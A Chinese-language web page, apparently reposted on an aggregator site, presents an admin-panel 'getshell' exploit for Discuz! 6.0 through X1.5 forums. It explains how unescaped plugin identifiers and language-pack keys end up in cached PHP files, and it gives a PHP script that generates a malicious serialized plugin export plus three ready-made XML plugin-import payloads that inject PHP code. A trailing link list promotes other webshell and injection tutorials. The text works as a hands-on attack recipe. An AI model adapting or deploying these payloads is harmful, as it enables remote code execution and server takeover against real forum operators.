当前位置: 首页 > news >正文

discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来

news 来源:原创 2024/5/6 13:21:00

discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~


附上 
从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。
一 Discuz! 6.0 和 Discuz! 7.0
既然要后台拿Shell,文件写入必看。
/include/cache.func.php

往上翻,找到调用函数的地方.都在updatecache函数中.

如果我们可以控制$plugin['identifier']就有机会,它是plugins表里读出来的.
去后台看看,你可以发现identifier对应的是唯一标示符.联想下二次注射,单引号从数据库读出后写入文件时不会被转义.贱笑一下.
但是……你懂的,当你去野区单抓对面DPS时,发现对面蹲了4个敌人的心情.
/admin/plugins.inc.php

还好Discuz!提供了导入的功能,好比你有隐身,对面没粉.你有疾风步,对面没控.好歹给咱留条活路.

随便新建一个插件,identifier为shell,生成文件路径及内容.然后导出备用.
/forumdata/cache/plugin_shell.php

我们可以输入任意数据,唯一要注意的是文件名的合法性.感谢微软,下面的文件名是合法的.
/forumdata/cache/plugin_a']=phpinfo();$a['a.php

最后是编码一次,给成Exp:
<?php
$a = unserialize(base64_decode ("YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIw
IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo
ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj
cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6
ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3
OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7
fQ=="));
//print_r($a);
$a['plugin']['name']='GetShell';
$a['plugin']['identifier']='a/']=phpinfo();$a[/'';
print(base64_encode(serialize($a)));
?>

7.0同理,大家可以自己去测试咯.如果你使用上面的代码,请勾选"允许导入不同版本 Discuz! 的插件"

二 Discuz! 7.2 和 Discuz! X1.5
以下以7.2为例
/admin/plugins.inc.php

先看导入数据的过程,Discuz! 7.2之后的导入数据使用XML,但是7.2保持了向下兼容.X1.5废弃了.

判定了identifier之后,7.0版本之前的漏洞就不存在了.但是它又加入了语言包……
我们只要控制scriptlangstr或者其它任何一个就可以了。

Key这里不通用.
7.2

X1.5

还是看下shell.lang.php的文件格式.

7.2版本没有过滤Key,所以直接用/废掉单引号.
X1.5,单引号转义后变为/',再被替换一次',还是留下了/
而$v在两个版本中过滤相同,比较通用.
X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问/admin.php?frames=yes&action=plugins添加插件
$v通用Exp:

<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board (]%3E%3C/item]http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item > 
          <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a"><![CDATA[b/]]></item> 
                                  <itemid=");phpinfo();?>"><![CDATA[x]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

7.2 Key利用
  
<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board (]%3E%3C/item]http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item > 
          <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a/"><![CDATA[=>1);phpinfo();?>]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

X1.5

<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board 
         (</item">http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item> 
         <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a'"><![CDATA[=>1);phpinfo();?>]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webshell.

相关文章:

  • 菲律宾 IT安全网被黑
  • freetextbox最新上传0day
  • 不改文件名的情况下上传突破
  • Mssql Public权限列目录
  • Ecshop 漏洞集合
  • DEDEcms GET shell 再次通杀 所有版本
  • N点主机管理系统密码解密代码程序
  • PHP168 V6.01/6.02权限提升及暴本地路径漏洞
  • 手工注入大全学习手册
  • ewebeditor不登陆后台也有机会拿shell
  • 网页编辑器漏洞手册
  • shopex 4.8.5.45144注入和远程shell写入漏洞
  • Aio.exe用法
  • 一句话木马及几种可绕过过滤格式
  • Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
  • [NodeJS] 关于Buffer
  • [分享]iOS开发 - 实现UITableView Plain SectionView和table不停留一起滑动
  • Cumulo 的 ClojureScript 模块已经成型
  • idea + plantuml 画流程图
  • PHP面试之三:MySQL数据库
  • Vim 折腾记
  • Vue 动态创建 component
  • vuex 笔记整理
  • Windows Containers 大冒险: 容器网络
  • 阿里云ubuntu14.04 Nginx反向代理Nodejs
  • 半理解系列--Promise的进化史
  • 大主子表关联的性能优化方法
  • 官方新出的 Kotlin 扩展库 KTX,到底帮你干了什么?
  • 基于HAProxy的高性能缓存服务器nuster
  • 今年的LC3大会没了?
  • 开源中国专访:Chameleon原理首发,其它跨多端统一框架都是假的?
  • 前端性能优化--懒加载和预加载
  • 我的面试准备过程--容器(更新中)
  • 一份游戏开发学习路线
  • linux 淘宝开源监控工具tsar
  • !$boo在php中什么意思,php前戏
  • %@ page import=%的用法
  • (14)Hive调优——合并小文件
  • (17)Hive ——MR任务的map与reduce个数由什么决定?
  • (pojstep1.3.1)1017(构造法模拟)
  • (算法)N皇后问题
  • .NET国产化改造探索(一)、VMware安装银河麒麟
  • [Android]常见的数据传递方式
  • [ANT] 项目中应用ANT
  • [AutoSar]BSW_Com07 CAN报文接收流程的函数调用
  • [C++]类和对象【上篇】
  • [C++11 多线程同步] --- 条件变量的那些坑【条件变量信号丢失和条件变量虚假唤醒(spurious wakeup)】
  • [CSS]文字旁边的竖线以及布局知识
  • [DM复习]关联规则挖掘(下)
  • [ffmpeg] x264 配置参数解析
  • [IE6 only]关于Flash/Flex,返回数据产生流错误Error #2032的解决方式
  • [ISITDTU 2019]EasyPHP
  • [LeetCode]剑指 Offer 42. 连续子数组的最大和
  • [NOIP2014] 提高组 洛谷P1941 飞扬的小鸟
  • [NOIP2015] 运输计划